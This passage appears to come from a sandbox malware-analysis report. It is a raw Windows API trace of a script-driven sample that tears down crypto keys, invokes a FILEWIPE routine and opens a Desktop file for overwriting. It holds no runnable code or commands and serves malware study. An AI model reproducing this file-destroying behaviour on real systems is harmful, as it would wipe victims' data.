returned 0x6bb578 [0076.632] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0076.632] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.632] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.632] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.632] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.632] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.632] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.632] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.632] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0076.632] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.632] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.632] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0076.633] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.636] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.636] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x80bc48 [0076.637] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.638] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.638] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0076.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.638] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.642] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.642] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.642] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.642] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.642] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.643] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.643] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.643] CryptDestroyKey (hKey=0x6b8ab8) returned 1 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.645] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.645] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.645] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.645] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.645] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.645] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.645] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.646] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.646] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.646] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.646] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0076.646] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.646] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0076.646] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.646] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.646] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0076.646] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.646] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.647] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.647] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0076.647] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db30 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.647] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0076.647] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.647] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.647] CryptReleaseContext (hProv=0x6969c0, dwFlags=0x0) returned 1 [0076.647] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.647] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.647] FreeLibrary (hLibModule=0x77710000) returned 1 [0076.647] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.648] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.648] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.648] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.648] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.649] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.649] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0076.649] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.653] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89da8c90, ftCreationTime.dwHighDateTime=0x1d5dddd, ftLastAccessTime.dwLowDateTime=0xab43cd40, ftLastAccessTime.dwHighDateTime=0x1d5d90c, ftLastWriteTime.dwLowDateTime=0xab43cd40, ftLastWriteTime.dwHighDateTime=0x1d5d90c, nFileSizeHigh=0x0, nFileSizeLow=0xeb7c, dwReserved0=0x0, dwReserved1=0x657690, cFileName="7zcAt1JobB0Roi5s.avi", cAlternateFileName="7ZCAT1~1.AVI")) returned 0x6b8b38 [0076.653] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.653] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.653] CharLowerBuffW (in: lpsz="byte[60284]", cchLength=0xb | out: lpsz="byte[60284]") returned 0xb [0076.654] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.654] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0076.654] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.654] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0076.654] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0076.655] FreeLibrary (hLibModule=0x76f90000) returned 1 [0076.655] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.655] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.655] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.657] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.658] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.658] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7zcat1jobb0roi5s.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0076.659] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.659] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.661] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.661] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.661] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0076.661] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.662] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.662] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.662] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.662] PeekMessageW 